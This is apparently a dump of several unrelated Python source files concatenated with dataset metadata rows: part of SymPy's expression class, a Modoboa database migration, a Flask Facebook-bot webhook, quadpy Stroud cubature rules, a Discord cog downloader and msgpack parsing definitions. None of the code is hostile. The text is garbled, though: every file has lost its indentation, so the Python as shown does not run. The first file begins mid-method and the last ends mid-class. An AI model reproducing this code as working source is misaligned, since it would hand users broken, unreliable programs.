if not x.is_Symbol:
raise ValueError('expecting a Symbol but got %s' % x)
if x not in self.free_symbols:
return self
obj = self._eval_as_leading_term(x)
if obj is not None:
return powsimp(obj, deep=True, combine='exp')
raise NotImplementedError('as_leading_term(%s, %s)' % (self, x))
def _eval_as_leading_term(self, x):
return self
def as_coeff_exponent(self, x):
""" ``c*x**e -> c,e`` where x can be any symbolic expression.
"""
from sympy import collect
s = collect(self, x)
c, p = s.as_coeff_mul(x)
if len(p) == 1:
b, e = p[0].as_base_exp()
if b == x:
return c, e
return s, S.Zero
def leadterm(self, x):
"""
Returns the leading term a*x**b as a tuple (a, b).
Examples
========
>>> from sympy.abc import x
>>> (1+x+x**2).leadterm(x)
(1, 0)
>>> (1/x**2+x+x**2).leadterm(x)
(1, -2)
"""
from sympy import Dummy, log
l = self.as_leading_term(x)
d = Dummy('logx')
if l.has(log(x)):
l = l.subs(log(x), d)
c, e = l.as_coeff_exponent(x)
if x in c.free_symbols:
from sympy.utilities.misc import filldedent
raise ValueError(filldedent("""
cannot compute leadterm(%s, %s). The coefficient
should have been free of x but got %s""" % (self, x, c)))
c = c.subs(d, log(x))
return c, e
def as_coeff_Mul(self, rational=False):
"""Efficiently extract the coefficient of a product. """
return S.One, self
def as_coeff_Add(self):
"""Efficiently extract the coefficient of a summation. """
return S.Zero, self
def fps(self, x=None, x0=0, dir=1, hyper=True, order=4, rational=True,
full=False):
"""
Compute formal power power series of self.
See the docstring of the :func:`fps` function in sympy.series.formal for
more information.
"""
from sympy.series.formal import fps
return fps(self, x, x0, dir, hyper, order, rational, full)
def fourier_series(self, limits=None):
"""Compute fourier sine/cosine series of self.
See the docstring of the :func:`fourier_series` in sympy.series.fourier
for more information.
"""
from sympy.series.fourier import fourier_series
return fourier_series(self, limits)
###################################################################################
##################### DERIVATIVE, INTEGRAL, FUNCTIONAL METHODS ####################
###################################################################################
def diff(self, *symbols, **assumptions):
new_symbols = list(map(sympify, symbols)) # e.g. x, 2, y, z
assumptions.setdefault("evaluate", True)
return Derivative(self, *new_symbols, **assumptions)
###########################################################################
###################### EXPRESSION EXPANSION METHODS #######################
###########################################################################
# Relevant subclasses should override _eval_expand_hint() methods. See
# the docstring of expand() for more info.
def _eval_expand_complex(self, **hints):
real, imag = self.as_real_imag(**hints)
return real + S.ImaginaryUnit*imag
@staticmethod
def _expand_hint(expr, hint, deep=True, **hints):
"""
Helper for ``expand()``. Recursively calls ``expr._eval_expand_hint()``.
Returns ``(expr, hit)``, where expr is the (possibly) expanded
``expr`` and ``hit`` is ``True`` if ``expr`` was truly expanded and
``False`` otherwise.
"""
hit = False
# XXX: Hack to support non-Basic args
# |
# V
if deep and getattr(expr, 'args', ()) and not expr.is_Atom:
sargs = []
for arg in expr.args:
arg, arghit = Expr._expand_hint(arg, hint, **hints)
hit |= arghit
sargs.append(arg)
if hit:
expr = expr.func(*sargs)
if hasattr(expr, hint):
newexpr = getattr(expr, hint)(**hints)
if newexpr != expr:
return (newexpr, True)
return (expr, hit)
@cacheit
def expand(self, deep=True, modulus=None, power_base=True, power_exp=True,
mul=True, log=True, multinomial=True, basic=True, **hints):
"""
Expand an expression using hints.
See the docstring of the expand() function in sympy.core.function for
more information.
"""
from sympy.simplify.radsimp import fraction
hints.update(power_base=power_base, power_exp=power_exp, mul=mul,
log=log, multinomial=multinomial, basic=basic)
expr = self
if hints.pop('frac', False):
n, d = [a.expand(deep=deep, modulus=modulus, **hints)
for a in fraction(self)]
return n/d
elif hints.pop('denom', False):
n, d = fraction(self)
return n/d.expand(deep=deep, modulus=modulus, **hints)
elif hints.pop('numer', False):
n, d = fraction(self)
return n.expand(deep=deep, modulus=modulus, **hints)/d
# Although the hints are sorted here, an earlier hint may get applied
# at a given node in the expression tree before another because of how
# the hints are applied. e.g. expand(log(x*(y + z))) -> log(x*y +
# x*z) because while applying log at the top level, log and mul are
# applied at the deeper level in the tree so that when the log at the
# upper level gets applied, the mul has already been applied at the
# lower level.
# Additionally, because hints are only applied once, the expression
# may not be expanded all the way. For example, if mul is applied
# before multinomial, x*(x + 1)**2 won't be expanded all the way. For
# now, we just use a special case to make multinomial run before mul,
# so that at least polynomials will be expanded all the way. In the
# future, smarter heuristics should be applied.
# TODO: Smarter heuristics
def _expand_hint_key(hint):
"""Make multinomial come before mul"""
if hint == 'mul':
return 'mulz'
return hint
for hint in sorted(hints.keys(), key=_expand_hint_key):
use_hint = hints[hint]
if use_hint:
hint = '_eval_expand_' + hint
expr, hit = Expr._expand_hint(expr, hint, deep=deep, **hints)
while True:
was = expr
if hints.get('multinomial', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_multinomial', deep=deep, **hints)
if hints.get('mul', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_mul', deep=deep, **hints)
if hints.get('log', False):
expr, _ = Expr._expand_hint(
expr, '_eval_expand_log', deep=deep, **hints)
if expr == was:
break
if modulus is not None:
modulus = sympify(modulus)
if not modulus.is_Integer or modulus <= 0:
raise ValueError(
"modulus must be a positive integer, got %s" % modulus)
terms = []
for term in Add.make_args(expr):
coeff, tail = term.as_coeff_Mul(rational=True)
coeff %= modulus
if coeff:
terms.append(coeff*tail)
expr = Add(*terms)
return expr
###########################################################################
################### GLOBAL ACTION VERB WRAPPER METHODS ####################
###########################################################################
def integrate(self, *args, **kwargs):
"""See the integrate function in sympy.integrals"""
from sympy.integrals import integrate
return integrate(self, *args, **kwargs)
def simplify(self, ratio=1.7, measure=None):
"""See the simplify function in sympy.simplify"""
from sympy.simplify import simplify
from sympy.core.function import count_ops
measure = measure or count_ops
return simplify(self, ratio, measure)
def nsimplify(self, constants=[], tolerance=None, full=False):
"""See the nsimplify function in sympy.simplify"""
from sympy.simplify import nsimplify
return nsimplify(self, constants, tolerance, full)
def separate(self, deep=False, force=False):
"""See the separate function in sympy.simplify"""
from sympy.core.function import expand_power_base
return expand_power_base(self, deep=deep, force=force)
def collect(self, syms, func=None, evaluate=True, exact=False, distribute_order_term=True):
"""See the collect function in sympy.simplify"""
from sympy.simplify import collect
return collect(self, syms, func, evaluate, exact, distribute_order_term)
def together(self, *args, **kwargs):
"""See the together function in sympy.polys"""
from sympy.polys import together
return together(self, *args, **kwargs)
def apart(self, x=None, **args):
"""See the apart function in sympy.polys"""
from sympy.polys import apart
return apart(self, x, **args)
def ratsimp(self):
"""See the ratsimp function in sympy.simplify"""
from sympy.simplify import ratsimp
return ratsimp(self)
def trigsimp(self, **args):
"""See the trigsimp function in sympy.simplify"""
from sympy.simplify import trigsimp
return trigsimp(self, **args)
def radsimp(self):
"""See the radsimp function in sympy.simplify"""
from sympy.simplify import radsimp
return radsimp(self)
def powsimp(self, deep=False, combine='all'):
"""See the powsimp function in sympy.simplify"""
from sympy.simplify import powsimp
return powsimp(self, deep, combine)
def combsimp(self):
"""See the combsimp function in sympy.simplify"""
from sympy.simplify import combsimp
return combsimp(self)
def factor(self, *gens, **args):
"""See the factor() function in sympy.polys.polytools"""
from sympy.polys import factor
return factor(self, *gens, **args)
def refine(self, assumption=True):
"""See the refine function in sympy.assumptions"""
from sympy.assumptions import refine
return refine(self, assumption)
def cancel(self, *gens, **args):
"""See the cancel function in sympy.polys"""
from sympy.polys import cancel
return cancel(self, *gens, **args)
def invert(self, g, *gens, **args):
"""Return the multiplicative inverse of ``self`` mod ``g``
where ``self`` (and ``g``) may be symbolic expressions).
See Also
========
sympy.core.numbers.mod_inverse, sympy.polys.polytools.invert
"""
from sympy.polys.polytools import invert
from sympy.core.numbers import mod_inverse
if self.is_number and getattr(g, 'is_number', True):
return mod_inverse(self, g)
return invert(self, g, *gens, **args)
def round(self, p=0):
"""Return x rounded to the given decimal place.
If a complex number would results, apply round to the real
and imaginary components of the number.
Examples
========
>>> from sympy import pi, E, I, S, Add, Mul, Number
>>> S(10.5).round()
11.
>>> pi.round()
3.
>>> pi.round(2)
3.14
>>> (2*pi + E*I).round()
6. + 3.*I
The round method has a chopping effect:
>>> (2*pi + I/10).round()
6.
>>> (pi/10 + 2*I).round()
2.*I
>>> (pi/10 + E*I).round(2)
0.31 + 2.72*I
Notes
=====
Do not confuse the Python builtin function, round, with the
SymPy method of the same name. The former always returns a float
(or raises an error if applied to a complex value) while the
latter returns either a Number or a complex number:
>>> isinstance(round(S(123), -2), Number)
False
>>> isinstance(S(123).round(-2), Number)
True
>>> isinstance((3*I).round(), Mul)
True
>>> isinstance((1 + 3*I).round(), Add)
True
"""
from sympy import Float
x = self
if x.is_number and not x.is_Atom:
xn = x.n(2)
if not pure_complex(xn, or_real=True):
raise TypeError('Expected a number but got %s:' %
getattr(getattr(x,'func', x), '__name__', type(x)))
elif x in (S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
return x
if not x.is_real:
i, r = x.as_real_imag()
return i.round(p) + S.ImaginaryUnit*r.round(p)
if not x:
return x
p = int(p)
precs = [f._prec for f in x.atoms(Float)]
dps = prec_to_dps(max(precs)) if precs else None
mag_first_dig = _mag(x)
allow = digits_needed = mag_first_dig + p
if dps is not None and allow > dps:
allow = dps
mag = Pow(10, p) # magnitude needed to bring digit p to units place
xwas = x
x += 1/(2*mag) # add the half for rounding
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
if i10.is_negative:
x = xwas - 1/(2*mag) # should have gone the other way
i10 = 10*mag*x.n((dps if dps is not None else digits_needed) + 1)
rv = -(Integer(-i10)//10)
else:
rv = Integer(i10)//10
q = 1
if p > 0:
q = mag
elif p < 0:
rv /= mag
rv = Rational(rv, q)
if rv.is_Integer:
# use str or else it won't be a float
return Float(str(rv), digits_needed)
else:
if not allow and rv > self:
allow += 1
return Float(rv, allow)
class AtomicExpr(Atom, Expr):
"""
A parent class for object which are both atoms and Exprs.
For example: Symbol, Number, Rational, Integer, ...
But not: Add, Mul, Pow, ...
"""
is_number = False
is_Atom = True
__slots__ = []
def _eval_derivative(self, s):
if self == s:
return S.One
return S.Zero
def _eval_is_polynomial(self, syms):
return True
def _eval_is_rational_function(self, syms):
return True
def _eval_is_algebraic_expr(self, syms):
return True
def _eval_nseries(self, x, n, logx):
return self
def _mag(x):
"""Return integer ``i`` such that .1 <= x/10**i < 1
Examples
========
>>> from sympy.core.expr import _mag
>>> from sympy import Float
>>> _mag(Float(.1))
0
>>> _mag(Float(.01))
-1
>>> _mag(Float(1234))
4
"""
from math import log10, ceil, log
from sympy import Float
xpos = abs(x.n())
if not xpos:
return S.Zero
try:
mag_first_dig = int(ceil(log10(xpos)))
except (ValueError, OverflowError):
mag_first_dig = int(ceil(Float(mpf_log(xpos._mpf_, 53))/log(10)))
# check that we aren't off by 1
if (xpos/10**mag_first_dig) >= 1:
assert 1 <= (xpos/10**mag_first_dig) < 10
mag_first_dig += 1
return mag_first_dig
from .mul import Mul
from .add import Add
from .power import Pow
from .function import Derivative, Function
from .mod import Mod
from .exprtools import factor_terms
from .numbers import Integer, Rational
| bsd-3-clause | -4,040,034,916,984,503,000 | 33.72596 | 109 | 0.514558 | false |
modoboa/modoboa | modoboa/relaydomains/migrations/0008_auto_20171123_1653.py | 1 | 1588 | # Generated by Django 1.10.7 on 2017-11-23 15:53
from django.db import migrations
def move_relaydomain_to_transport(apps, schema_editor):
"""Transform relaydomains to transports."""
RelayDomain = apps.get_model("relaydomains", "RelayDomain")
RecipientAccess = apps.get_model("relaydomains", "RecipientAccess")
Transport = apps.get_model("transport", "Transport")
ra_to_create = []
for rd in RelayDomain.objects.select_related("domain", "service"):
next_hop = "[{}]:{}".format(rd.target_host, rd.target_port)
tr = Transport.objects.create(
pattern=rd.domain.name,
service="relay",
next_hop=next_hop,
_settings={
"relay_target_host": rd.target_host,
"relay_target_port": rd.target_port,
"relay_verify_recipients": rd.verify_recipients
}
)
rd.domain.transport = tr
rd.domain.save(update_fields=["transport"])
if not rd.verify_recipients:
continue
ra_to_create.append(
RecipientAccess(
pattern=rd.domain.name, action="reject_unverified_recipient"))
RecipientAccess.objects.bulk_create(ra_to_create)
def forward(apps, schema_editor):
"""Empty."""
pass
class Migration(migrations.Migration):
dependencies = [
('relaydomains', '0007_recipientaccess'),
('transport', '0001_initial'),
('admin', '0011_domain_transport'),
]
operations = [
migrations.RunPython(move_relaydomain_to_transport, forward)
]
| isc | -2,182,599,120,591,932,700 | 32.083333 | 78 | 0.611461 | false |
Akash334/bot | app.py | 1 | 2474 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib
import json
import os
import re
from flask import Flask
from flask import request
from flask import make_response
from random import randint
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print 'Request:'
print json.dumps(req, indent=4)
res = processRequest(req)
res = json.dumps(res, indent=4)
# print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def processRequest(req):
if req.get('result').get('action') != 'yahooWeatherForecast':
return {}
data = "this is the response from webhook"
res = makeWebhookResult(data)
return res
def makeWebhookResult(data):
number=randint(1,15)
charnumber='1'
speech = "This is the response from server" + "and" + str(number)
print(speech)
print("Here is your question!")
message= {
"attachment":{
"type":"template",
"payload":{
"template_type":"generic",
"elements":[{
"title":"Get Real",
"image_url":"https://www.getreal.life/images/qus"+str(number)+".png",
"buttons":[
{
"type":"element_share"
}
]
}
]
}
},
"quick_replies": [
{
"content_type":"text",
"title": "Ask Me",
"payload": "Ask Me"
},
{
"content_type":"text",
"title": "Ask Bot",
"payload": "Ask Bot"
},
{
"content_type":"text",
"title": "Download App",
"payload": "Download App"
},
{
"content_type":"text",
"title": "50 Power Questions",
"payload": "50 Power Questions"
},
{
"content_type":"location"
}
]
}
return {
"speech": speech,
"displayText": speech,
"data": {"facebook": message}
# "contextOut": [],
#"source": "apiai-weather-webhook-sample"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print 'Starting app on port %d' % port
app.run(debug=False, port=port, host='0.0.0.0')
| apache-2.0 | -7,652,880,332,143,322,000 | 22.121495 | 83 | 0.494745 | false |
nschloe/quadpy | src/quadpy/cn/_stroud_1957.py | 1 | 1501 | import numpy as np
from sympy import Rational as frac
from sympy import cos, pi, sin, sqrt
from ..helpers import article, untangle
from ._helpers import CnScheme, _s
_source = article(
authors=["A.H. Stroud"],
title="Remarks on the Disposition of Points in Numerical Integration Formulas",
journal="Mathematical Tables and Other Aids to Computation",
volume="11",
number="60",
month="oct",
year="1957",
pages="257-261",
url="https://doi.org/10.2307/2001945",
)
def stroud_1957_2(n):
r = sqrt(3) / 6
data = [
(1.0, np.array([np.full(n, 2 * r)])),
(+r, _s(n, -1, r)),
(-r, _s(n, +1, r)),
]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-2", n, weights, points, 2, _source, 1.511e-14)
def stroud_1957_3(n):
n2 = n // 2 if n % 2 == 0 else (n - 1) // 2
i_range = range(1, 2 * n + 1)
pts = [
[
[sqrt(frac(2, 3)) * cos((2 * k - 1) * i * pi / n) for i in i_range],
[sqrt(frac(2, 3)) * sin((2 * k - 1) * i * pi / n) for i in i_range],
]
for k in range(1, n2 + 1)
]
if n % 2 == 1:
sqrt3pm = np.full(2 * n, 1 / sqrt(3))
sqrt3pm[1::2] *= -1
pts.append(sqrt3pm)
pts = np.vstack(pts).T
data = [(frac(1, 2 * n), pts)]
points, weights = untangle(data)
points = np.ascontiguousarray(points.T)
return CnScheme("Stroud 1957-3", n, weights, points, 3, _source)
| mit | -844,945,079,170,114,800 | 26.796296 | 83 | 0.545636 | false |
logicaloperate/Project-Apollo | cogs/downloader.py | 1 | 6114 | import discord
from discord.ext import commands
from .utils.dataIO import fileIO
from .utils import checks
from .utils.chat_formatting import box
from __main__ import send_cmd_help, set_cog
import os
from subprocess import call, Popen
from distutils.dir_util import copy_tree
import shutil
import asyncio
class Downloader:
"""Cog downloader/installer."""
def __init__(self, bot):
self.bot = bot
self.path = "data/downloader/cogs/"
@commands.group(pass_context=True)
@checks.is_owner()
async def cog(self, ctx):
"""Additional cogs management"""
if ctx.invoked_subcommand is None:
await send_cmd_help(ctx)
@cog.command(name="list")
async def _send_list(self):
"""Lists installable cogs"""
index = await self.make_index()
msg = "Available cogs:\n\n"
for cog in index.keys():
if not index[cog]["DISABLED"]:
msg += cog + "\t" + index[cog]["NAME"] + "\n"
await self.bot.say(box(msg)) # Need to deal with over 2000 characters
@cog.command()
async def info(self, cog : str):
"""Shows info about the specified cog"""
cogs = self.list_cogs()
info_file = self.path + cog + "/info.json"
if cog in cogs:
if os.path.isfile(info_file):
data = fileIO(info_file, "load")
msg = "{} by {}\n\n".format(cog, data["AUTHOR"])
msg += data["NAME"] + "\n\n" + data["DESCRIPTION"]
await self.bot.say(box(msg))
else:
await self.bot.say("The specified cog has no info file.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
@cog.command(hidden=True)
async def search(self, *terms : str):
"""Search installable cogs"""
pass #TO DO
@cog.command(pass_context=True)
async def update(self, ctx):
"""Updates cogs"""
self.update_repo()
await self.bot.say("Downloading updated cogs. Wait 10 seconds...")
await asyncio.sleep(10) # TO DO: Wait for the result instead, without being blocking.
downloadable_cogs = self.list_cogs()
all_cogs = [f.replace(".py", "") for f in os.listdir("cogs/") if f.endswith(".py")]
installed_user_cogs = [f for f in all_cogs if f in downloadable_cogs]
for cog in installed_user_cogs:
result = await self.install(cog)
await self.bot.say("Cogs updated. Reload all installed cogs? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
elif answer.content.lower().strip() in ["yes", "y"]:
for cog in installed_user_cogs:
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can reload cogs with `{}reload <cog_name>`".format(ctx.prefix))
@cog.command(name="install", pass_context=True)
async def _install(self, ctx, cog : str):
"""Installs specified cog"""
install_cog = await self.install(cog)
if install_cog:
await self.bot.say("Installation completed. Load it now? (yes/no)")
answer = await self.bot.wait_for_message(timeout=15, author=ctx.message.author)
if answer is None:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif answer.content.lower().strip() in ["yes", "y"]:
set_cog("cogs." + cog, True)
self.bot.unload_extension("cogs." + cog)
self.bot.load_extension("cogs." + cog)
await self.bot.say("Done.")
else:
await self.bot.say("Ok then, you can load it with `{}load {}`".format(ctx.prefix, cog))
elif install_cog == False:
await self.bot.say("Invalid cog. Installation aborted.")
else:
await self.bot.say("That cog doesn't exist. Use cog list to see the full list.")
async def make_index(self):
cogs = self.list_cogs()
index = {}
if not cogs:
await self.bot.say("There are no cogs available for installation.")
return
for cog in cogs:
if os.path.isfile(self.path + cog + "/info.json"):
info = fileIO(self.path + cog + "/info.json", "load")
index[cog] = info
# Sort by alphabetic order?
return index
async def install(self, cog):
cogs = self.list_cogs()
cog = cog.lower()
if not cog in cogs:
return None
files = [f for f in os.listdir(self.path + cog) if os.path.isfile(self.path + cog + "/" + f)] # Listing all files (not dirs) in the cog directory
cog_file = [f for f in files if f.endswith(".py")] #Verifying the presence of a single py file
if len(cog_file) != 1:
return False
cog_file = cog_file[0]
print("Copying {}...".format(cog_file))
shutil.copy(self.path + cog + "/" + cog_file, "cogs/")
cog_data_path = self.path + cog + "/data"
if os.path.exists(cog_data_path):
print("Copying {}'s data folder...".format(cog))
copy_tree(cog_data_path, "data/" + cog)
return True
def list_cogs(self):
dirs = [d for d in os.listdir(self.path) if os.path.exists(self.path + d)]
return dirs
def update_repo(self):
if not os.path.exists("data/downloader"):
print("Downloading cogs repo...")
call(["git", "clone", "https://github.com/Twentysix26/Red-Cogs.git", "data/downloader"]) # It's blocking but it shouldn't matter
else:
Popen(["git", "-C", "data/downloader", "pull", "-q"])
def setup(bot):
n = Downloader(bot)
n.update_repo()
bot.add_cog(n) | gpl-3.0 | 4,744,360,861,402,750,000 | 40.598639 | 153 | 0.570985 | false |
arizvisa/syringe | template/protocol/mp.py | 1 | 13773 | import ptypes
from ptypes import *
ptypes.setbyteorder(ptypes.config.byteorder.bigendian)
### definitions
class bit0(ptype.definition): cache = {}
class bit1(ptype.definition): cache = {}
class bit2container(ptype.definition): cache = {}
class bit2msgtype(ptype.definition): cache = {}
class bit3arraymap(ptype.definition): cache = {}
class d_packet(ptype.definition): cache = {}
### packet
class packet(pstruct.type):
_fields_ = [
(lambda s: t_packet, 'type'),
(lambda s: d_packet.lookup(s['type'].li.PackedType()), 'data'),
]
def packedValue(self):
return self['type'].PackedValue()
class t_packet(pbinary.struct):
def __value(self):
return bit0.lookup(self['otherQ'])
_fields_ = [
(1, 'otherQ'),
(__value, 'value'),
]
def PackedType(self):
'''Return the msgpack type-id for the packet.'''
return self.__field__('value').PackedType()
def PackedValue(self):
'''Return the integer value encoded within the type field of the packet.'''
return self.__field__('value').PackedValue()
def summary(self):
res = d_packet.lookup(self.PackedType())
return '{:s} {:s}'.format(res.typename(), super(t_packet,self).summary())
## first bit : positive-fixint or other
@bit0.define
class t_positive_fixint(pbinary.integer):
type = 0
def blockbits(self): return 7
def PackedType(self): return 0b00000000
def PackedValue(self): return self.int()
@bit0.define
class t_fixother(pbinary.struct):
type = 1
def __value(self):
return bit1.lookup(self['groupQ'])
_fields_ = [
(1, 'groupQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## second bit : container or group
@bit1.define
class t_1fixcontainer(pbinary.struct):
type = 0
def __value(self):
return bit2container.lookup(self['strQ'])
_fields_ = [
(1, 'strQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
@bit1.define
class t_fixgroup(pbinary.struct):
type = 1
def __value(self):
return bit2msgtype.lookup(self['negative-fixintQ'])
_fields_ = [
(1, 'negative-fixintQ'),
(__value, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## third bit : str or array/map
@bit2container.define
class t_fixstr(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b10100000
def PackedValue(self): return self.int()
@bit2container.define
class t_2fixcontainer(pbinary.struct):
type = 0
def __container(self):
return bit3arraymap.lookup(self['arrayQ'])
_fields_ = [
(1, 'arrayQ'),
(__container, 'value'),
]
def PackedType(self): return self.__field__('value').PackedType()
def PackedValue(self): return self.__field__('value').PackedValue()
## fourth bit: array or map
@bit3arraymap.define
class t_fixmap(pbinary.integer):
type = 0
def blockbits(self): return 4
def PackedType(self): return 0b10000000
def PackedValue(self): return self.int()
@bit3arraymap.define
class t_fixarray(pbinary.integer):
type = 1
def blockbits(self): return 4
def PackedType(self): return 0b10010000
def PackedValue(self): return self.int()
## third bit : negative-fixint or messagetype
@bit2msgtype.define
class t_negative_fixint(pbinary.integer):
type = 1
def blockbits(self): return 5
def PackedType(self): return 0b11100000
def PackedValue(self): return self.int()
@bit2msgtype.define
class t_message(pbinary.enum):
type, length = 0, 5
def PackedType(self): return (0b11 << 6) | self.int()
def PackedValue(self): raise NotImplementedError
_values_ = [
('nil', 0b00000),
('(neverused)', 0b00001),
('false', 0b00010),
('true', 0b00011),
('bin8', 0b00100),
('bin16', 0b00101),
('bin32', 0b00110),
('ext8', 0b00111),
('ext16', 0b01000),
('ext32', 0b01001),
('float32', 0b01010),
('float64', 0b01011),
('uint8', 0b01100),
('uint16', 0b01101),
('uint32', 0b01110),
('uint64', 0b01111),
('int8', 0b10000),
('int16', 0b10001),
('int32', 0b10010),
('int64', 0b10011),
('fixext1', 0b10100),
('fixext2', 0b10101),
('fixext4', 0b10110),
('fixext8', 0b10111),
('fixext16', 0b11000),
('str8', 0b11001),
('str16', 0b11010),
('str32', 0b11011),
('array16', 0b11100),
('array32', 0b11101),
('map16', 0b11110),
('map32', 0b11111),
]
### Message data types
class summaryStructure(pstruct.type):
def summary(self):
if len(self._fields_) > 1:
return super(summaryStructure, self).summary()
res = ('{:s}={:s}'.format(k, self[k].summary()) for _, k in self._fields_)
return '{{{:s}}}'.format(', '.join(res))
class ConstantHolder(ptype.block):
constant = None
def get(self):
return None
def set(self, value):
raise NotImplementedError
class PackedIntegerHolder(pint.uint_t):
def get(self):
return self.getparent(packet).packedValue()
def summary(self):
return '{integer:d} ({integer:+#x})'.format(integer=self.get())
def set(self, value):
pkt = self.getparent(packet)
leafs = pkt['type'].traverse(edges=lambda self: self.value, filter=lambda self: isinstance(self, pbinary.type) and self.bits() > 1)
res = list(leafs)[-1]
if res.name() != 'value':
raise AssertionError
return res.set(value)
@d_packet.define
class d_nil(summaryStructure):
type = 0b11000000
class _ConstantHolderNone(ConstantHolder): constant = None
_fields_ = [(_ConstantHolderNone, 'Value')]
@d_packet.define
class d_true(summaryStructure):
type = 0b11000010
class _ConstantHolderTrue(ConstantHolder): constant = True
_fields_ = [(_ConstantHolderTrue, 'Value')]
@d_packet.define
class d_false(summaryStructure):
type = 0b11000011
class _ConstantHolderFalse(ConstantHolder): constant = False
_fields_ = [(_ConstantHolderFalse, 'Value')]
@d_packet.define
class d_positive_fixint(summaryStructure):
type = 0b00000000
_fields_ = [(PackedIntegerHolder, 'Value')]
@d_packet.define
class d_negative_fixint(summaryStructure):
type = 0b11100000
class _PackedSignedIntegerHolder(PackedIntegerHolder):
def get(self):
return -0x20 + super(d_negative_fixint._PackedSignedIntegerHolder, self).get()
_fields_ = [(_PackedSignedIntegerHolder, 'Value')]
@d_packet.define
class d_uint8(summaryStructure):
type = 0b11001100
_fields_ = [(pint.uint8_t,'Value')]
@d_packet.define
class d_uint16(summaryStructure):
type = 0b11001101
_fields_ = [(pint.uint16_t,'Value')]
@d_packet.define
class d_uint32(summaryStructure):
type = 0b11001110
_fields_ = [(pint.uint32_t,'Value')]
@d_packet.define
class d_uint64(summaryStructure):
type = 0b11001111
_fields_ = [(pint.uint64_t,'Value')]
@d_packet.define
class d_int8(summaryStructure):
type = 0b11010000
_fields_ = [(pint.int8_t,'Value')]
@d_packet.define
class d_int16(pstruct.type):
type = 0b11010001
_fields_ = [(pint.int16_t,'Value')]
@d_packet.define
class d_int32(pstruct.type):
type = 0b11010010
_fields_ = [(pint.int32_t,'Value')]
@d_packet.define
class d_int64(pstruct.type):
type = 0b11010011
_fields_ = [(pint.int64_t,'Value')]
@d_packet.define
class d_float32(pstruct.type):
type = 0b11001010
_fields_ = [(pfloat.single,'Value')]
@d_packet.define
class d_float64(pstruct.type):
type = 0b11001011
_fields_ = [(pfloat.double,'Value')]
@d_packet.define
class d_fixstr(summaryStructure):
type = 0b10100000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str8(summaryStructure):
type = 0b11011001
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str16(summaryStructure):
type = 0b11011010
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_str32(summaryStructure):
type = 0b11011011
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.clone(pstr.string, length=s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin8(summaryStructure):
type = 0b11000100
_fields_ = [
(pint.uint8_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin16(summaryStructure):
type = 0b11000101
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_bin32(summaryStructure):
type = 0b11000110
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.block(s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixarray(summaryStructure):
type = 0b10010000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array16(summaryStructure):
type = 0b11011100
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_array32(summaryStructure):
type = 0b11011101
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()), 'Value'),
]
@d_packet.define
class d_fixmap(summaryStructure):
type = 0b10000000
_fields_ = [
(PackedIntegerHolder, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
def Data(self):
p = self.getparent(packet)
return p['type'].PackedValue()
@d_packet.define
class d_map16(summaryStructure):
type = 0b11011110
_fields_ = [
(pint.uint16_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_map32(summaryStructure):
type = 0b11011111
_fields_ = [
(pint.uint32_t, 'Length'),
(lambda s: dyn.array(packet, s['Length'].li.get()*2), 'Value'),
]
@d_packet.define
class d_fixext1(summaryStructure):
type = 0b11010100
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 1), 'Value'),
]
@d_packet.define
class d_fixext2(summaryStructure):
type = 0b11010101
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 2), 'Value'),
]
@d_packet.define
class d_fixext4(summaryStructure):
type = 0b11010110
_fields_ = [
(pint.sint8_t, 'Type'),
(dyn.array(pint.uint8_t, 4), 'Value'),
]
@d_packet.define
class d_fixext8(summaryStructure):
type = 0b11010111
_fields_ = [
(pint.sint8_t, 'Type'),
